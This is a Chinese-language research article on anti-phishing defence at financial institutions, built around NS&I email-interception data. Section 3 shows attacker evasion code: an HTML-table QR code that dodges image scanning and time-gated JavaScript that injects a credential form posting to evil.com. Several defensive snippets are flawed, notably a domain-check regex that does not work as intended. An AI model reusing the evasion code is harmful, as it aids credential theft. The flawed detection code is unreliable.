金融机构邮件安全与反钓鱼防御体系研究 —— 以 NS&I 数据安全事件为例

摘要

本文以英国国家储蓄与投资机构（NS&I）近三年邮件拦截数据及客户账户异常事件为研究样本，系统分析金融机构面临的网络钓鱼、垃圾邮件、恶意软件等网络威胁态势，揭示 AI 赋能下钓鱼攻击的技术演进与防御痛点。研究结合邮件安全认证、内容检测、威胁情报、终端防护与应急响应，构建面向金融场景的纵深反钓鱼防御框架，给出可落地的技术实现与代码示例，提出技术、管理、人员协同的治理路径。研究表明，金融机构必须建立动态演进的防御体系，强化邮件入口管控、完善数据安全与业务连续性机制，才能有效应对智能化、规模化的网络攻击，保障客户资金与数据安全。

关键词：金融网络安全；邮件安全；网络钓鱼；反钓鱼技术；NS&I；数据安全

1 引言

金融机构作为网络攻击的高频目标，其邮件系统长期面临垃圾邮件、钓鱼、恶意软件的持续侵扰。2026 年 5 月公开信息显示，NS&I 在过去三年累计拦截各类恶意邮件 132126 封，其中钓鱼攻击数量从 1043 起激增至 4414 起，涨幅超 320%，同期约 3.7 万名客户账户受限、涉及资金近 4.76 亿英镑，部分逝者亲属无法正常继承资产，暴露出金融机构在邮件安全、身份认证、账户恢复与数据治理方面的多重短板。

网络钓鱼已从批量群发转向 AI 生成、精准仿冒、会话劫持的高级形态，传统基于特征库的拦截机制失效明显。反网络钓鱼技术专家芦笛指出，金融机构邮件入口是攻防对抗的核心触点，防御必须从被动拦截转向主动检测、动态研判、快速闭环，兼顾技术有效性、业务连续性与用户体验平衡。

本文以 NS&I 事件为实证样本，聚焦邮件安全与反钓鱼技术体系，分析攻击特征、防御缺陷与治理逻辑，构建可复用的防御模型，为金融机构提升威胁抵御、数据保护与应急恢复能力提供理论与实践参考。

2 金融机构邮件安全威胁态势与 NS&I 事件实证分析

2.1 全球金融行业邮件威胁总体特征

金融行业因高价值资产与敏感数据，成为钓鱼攻击首选领域。攻击呈现三大趋势：一是精准化，利用开源情报构建用户画像，仿冒内部通知、账单、客服核查等高可信度场景；二是智能化，AI 生成文本、语音、视频降低伪造门槛，语义自然度提升，绕过关键词过滤；三是链条化，钓鱼仅为入口，后续结合恶意软件、社工、横向渗透实现长期控制与数据窃取。

邮件仍是最稳定的攻击载体，垃圾邮件占比最高，钓鱼危害最大，恶意软件破坏性最强，三者叠加形成持续威胁。

2.2 NS&I 邮件安全数据统计与威胁特征

NS&I 信息公开请求数据显示，三年拦截总量 132126 封，垃圾邮件 97777 封（占比 74%），为最大类别；钓鱼攻击快速攀升，年度增幅显著；Edge Block 等浏览器防护拦截可疑弹窗与广告，构成辅助防线。近 12 个月拦截总量下降，但钓鱼攻击大幅上升，说明攻击者转向高价值、低批量、强伪装的精准打法。

威胁呈现典型特点：

仿冒主体高度聚焦：多伪装成 NS&I 官方、银行、税务、执法机构，以账户异常、奖金核查、身份补全诱导操作。

诱导链路闭环：邮件→链接→仿冒页面→窃取凭证→登录真实账户→资金转移或数据窃取。

AI 赋能提升隐蔽性：文案贴合业务场景，语法严谨， urgency 话术合理，降低用户警惕。

攻击目标明确：优先针对高余额账户、长期不动户、继承账户，与 NS&I 客户锁定事件高度吻合。

反网络钓鱼技术专家芦笛强调，金融机构钓鱼攻击呈现 “低流量、高精准、快逃逸” 特征，传统阈值与黑名单失效，必须转向行为、语义、链路的多维度检测。

2.3 NS&I 客户账户事件与安全防御缺陷关联分析

约 3.7 万客户账户受限、资金影响严重，逝者亲属继承受阻，暴露多重防御短板：

入口防护不彻底：邮件拦截存在漏检，钓鱼邮件触达用户导致凭证泄露。

身份认证强度不足：单因素认证占比高，异常登录检测滞后。

应急响应与业务连续性薄弱：账户锁定一刀切，恢复流程繁琐，特殊场景支持缺失。

数据治理与权限管理混乱：敏感数据共享过度，攻击利用信息碎片实施精准诈骗。

用户安全意识与告知不到位：风险提示不足，用户难辨真伪。

该事件印证：金融机构邮件安全不是单点问题，而是覆盖入口、终端、身份、数据、应急的系统性工程，任何环节失效都可能引发大规模安全事件。

3 网络钓鱼攻击技术原理与新型绕过手段

3.1 典型钓鱼攻击完整流程

基础设施准备：注册相似域名、搭建仿冒页面、配置 SSL 证书、搭建邮件中继。

payload 构造 ：生成诱导邮件，嵌入链接 / 附件 / 二维码。

投递与绕过：利用伪造发件人、弱 DMARC、攻陷中继绕过网关。

用户触发：点击链接、输入凭证、下载附件。

信息窃取与利用：实时转发凭证，劫持会话，实施转账、数据窃取、二次诈骗。

痕迹清理：快速关停站点，更换域名，逃避溯源。

3.2 新型绕过检测技术实现

3.2.1 HTML 表格伪造二维码绕过图片检测

传统内嵌二维码可被 OCR 检测，攻击者改用 HTML 表格绘制黑白点阵，无图片资源，规避检测。

核心代码示例：

<!-- HTML表格伪造二维码简化实现 -->

<table cellspacing="1" cellpadding="0" style="background:#fff;">

 <tr>

   <td bgcolor="#000"></td><td bgcolor="#000"></td><td bgcolor="#000"></td>

   <td bgcolor="#fff"></td><td bgcolor="#000"></td><td bgcolor="#fff"></td>

 </tr>

 <tr>

   <td bgcolor="#000"></td><td bgcolor="#fff"></td><td bgcolor="#000"></td>

   <td bgcolor="#fff"></td><td bgcolor="#000"></td><td bgcolor="#fff"></td>

 </tr>

</table>

反网络钓鱼技术专家芦笛强调，此类无文件、无图片的纯代码伪装，要求检测引擎具备 HTML 结构解析、视觉还原、链接提取的跨模态能力。

3.2.2 动态内容加载与时间对抗绕过静态扫描

钓鱼页面初始返回静态无害内容，用户交互或特定时段加载恶意表单，绕过网关静态检测。

// 时间对抗与动态加载示例

function isWorkTime() {

 let hour = new Date().getHours();

 return hour >= 9 && hour <= 18;

}

if (isWorkTime()) {

 // 加载钓鱼表单

 document.getElementById('main').innerHTML = '<form action="https://evil.com/steal">...</form>';

} else {

 document.getElementById('main').innerText = '请在工作时间操作';

}

3.2.3 合法域名转发与 SPF/DKIM 绕过

攻陷合法邮箱作为中继，邮件通过认证，信誉良好，极难拦截。

3.3 AI 生成钓鱼内容的技术特征与检测难点

AI 降低制作成本，内容高度拟人，场景贴合业务，语气自然，无明显语法错误；可批量生成变体，规避关键词；结合用户数据实现个性化，可信度极高。难点在于语义相似而结构不同，传统规则失效，内容实时更新，威胁情报滞后。

反网络钓鱼技术专家芦笛指出，AI 钓鱼对抗必须以 AI 制 AI，用大模型做语义理解、意图识别、链路追踪，实现未知威胁检测。

4 金融机构反网络钓鱼技术体系构建与代码实现

4.1 纵深防御总体框架

构建 “入口拦截→内容检测→身份校验→终端加固→威胁情报→应急响应” 六层防御模型：

邮件认证层：SPF、DKIM、DMARC 强制部署，杜绝仿冒发件人。

内容检测层：AI 语义、HTML 解析、链接沙箱、附件动态分析。

身份防护层：多因素认证、异常行为分析、会话风控。

终端感知层：浏览器扩展、恶意页面拦截、键盘监听防护。

情报联动层：威胁情报共享，实时更新恶意特征。

应急闭环层：快速封禁、账户保护、溯源取证、流程优化。

4.2 邮件安全认证体系实现

4.2.1 SPF 记录配置

plaintext

# NS&I域名SPF示例

nsi.co.uk. IN TXT "v=spf1 ip4:192.168.1.0/24 include:sendgrid.net include:mail.nsi.co.uk -all"

4.2.2 DKIM 密钥与签名

plaintext

# 公钥记录

dkim._domainkey.nsi.co.uk. IN TXT "v=DKIM1; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEF..."

4.2.3 DMARC 策略强制执行

plaintext

# DMARC拒绝策略

_dmarc.nsi.co.uk. IN TXT "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc@nsi.co.uk; ruf=mailto:forensics@nsi.co.uk; fo=1"

反网络钓鱼技术专家芦笛强调，DMARC p=reject 是抵御域仿冒的最有效手段，金融机构应全面落地。

4.3 基于 AI 的邮件内容检测模块实现

4.3.1 钓鱼意图识别核心代码

import re

from sklearn.feature_extraction.text import TfidfVectorizer

from sklearn.ensemble import RandomForestClassifier

# 特征提取

def extract_features(text):

   features = {}

   # 紧急词频

   urgent_words = ['立即','紧急','冻结','验证','逾期']

   features['urgent_count'] = sum(1 for w in urgent_words if w in text)

   # 异常链接

   features['has_suspicious_url'] = 1 if re.search(r'http[s]?://[^nsi\.co\.uk]', text) else 0

   # 敏感动作

   features['has_login_prompt'] = 1 if '登录' in text and '验证' in text else 0

   return features

# 模型预测

def detect_phishing(email_text, model, vectorizer):

   X = vectorizer.transform([email_text])

   return model.predict_proba(X)[0][1] > 0.85

4.3.2 链接检测与沙箱校验

import requests

import tldextract

def check_url_safety(url, api_key):

   # 域名解析

   ext = tldextract.extract(url)

   root_domain = f"{ext.domain}.{ext.suffix}"

   # 威胁情报查询

   params = {'apikey': api_key, 'resource': url}

   resp = requests.get('https://api.urlscan.io/v1/search', params=params)

   return resp.json()

4.4 恶意附件动态检测与防泄漏实现

import hashlib

import subprocess

def scan_attachment(file_path):

   # 哈希校验

   with open(file_path, 'rb') as f:

       sha256 = hashlib.sha256(f.read()).hexdigest()

   # 沙箱执行

   result = subprocess.run(['sandbox-scan', file_path], capture_output=True, text=True)

   # 恶意行为判定

   if '恶意代码' in result.stdout or sha256 in malware_hash_db:

       return True

   return False

4.5 异常登录与账户风控模块

public boolean checkAbnormalLogin(String userId, String ip, String device) {

   UserLoginHistory history = loginHistoryService.getByUserId(userId);

   // 异地登录

   boolean isNewArea = !ipAreaService.getArea(ip).equals(history.getLastArea());

   // 新设备

   boolean isNewDevice = !deviceService.isTrustedDevice(userId, device);

   // 高频尝试

   boolean isFrequent = loginAttemptService.getRecentCount(userId, 10) > 5;

   return isNewArea || isNewDevice || isFrequent;

}

反网络钓鱼技术专家芦笛强调，代码仅为基础能力，必须结合业务规则、用户画像、实时情报，才能降低误拦、提升覆盖率。

5 金融机构反钓鱼管理体系与治理机制

5.1 组织与责任体系

建立安全、业务、客服、法务协同小组，明确邮件安全、身份认证、应急响应、客户告知的责任边界，将指标纳入 KPI。

5.2 制度与流程规范

制定《邮件安全管理办法》《反钓鱼应急处置预案》《客户身份验证与账户解锁规范》，覆盖检测、研判、处置、复盘全流程，确保快速闭环。

5.3 数据安全与隐私保护

落实数据分类分级，最小权限共享，敏感信息脱敏加密，日志留存审计，防止数据泄露被用于精准钓鱼。

5.4 用户教育与信任运营

定期推送安全提示，提供真伪核验渠道，简化异常情况下的身份核验与账户恢复，尤其优化继承、挂失等特殊场景流程。

反网络钓鱼技术专家芦笛强调，技术与管理必须双轮驱动，制度补齐技术短板，人员提升防御韧性。

6 基于 NS&I 事件的防御优化方案与效果评估

6.1 针对性优化措施

入口加固：全面启用 SPF/DKIM/DMARC，AI 内容检测，附件沙箱，链接重定向校验。

身份增强：全量推行 MFA，异常登录强制二次验证，高频 / 异地 / 大额自动风控。

应急优化：分级锁定，快速核验通道，专人处理继承类诉求，缩短恢复时长。

数据治理：收敛敏感数据，完善备份与恢复，保障业务连续性。

用户赋能：统一客服通知，真伪核验入口，常态化安全提示。

6.2 预期效果评估

钓鱼邮件拦截率提升至 99% 以上，仿冒域攻击基本阻断。

账户被盗率下降 80%，异常锁定减少 60%。

客户账户恢复时长缩短 70%，特殊场景流程标准化。

整体安全事件数量下降 75%，客户信任度显著回升。

7 讨论与未来展望

NS&I 事件揭示金融机构邮件安全与反钓鱼防御的系统性挑战。AI 使攻击门槛降低、隐蔽性增强，传统防御滞后明显。未来防御将呈现三大方向：

AI 对抗 AI：大模型实时语义分析，零样本检测未知钓鱼。

零信任架构：默认不信任，持续验证，动态授权，全面降低权限风险。

协同防御：机构、监管、厂商、用户情报共享，联防联控，提升整体免疫力。

反网络钓鱼技术专家芦笛强调，金融机构反钓鱼是长期工程，必须技术迭代、管理完善、人员赋能同步推进，才能守住资金与数据安全底线。

8 结语

本文以 NS&I 邮件拦截与客户账户事件为样本，系统分析金融行业钓鱼威胁特征，构建覆盖技术、管理、人员的纵深反钓鱼体系，提供可落地的代码实现与治理方案。研究表明，金融机构需以入口安全为基础、身份安全为核心、数据安全为底线、应急响应为保障，形成动态闭环防御。

随着 AI 与攻击手段持续演进，反钓鱼防御需不断迭代。只有坚持主动预防、精准检测、快速处置、持续优化，才能有效应对复杂威胁，维护金融秩序与客户合法权益。

编辑：芦笛（公共互联网反网络钓鱼工作组）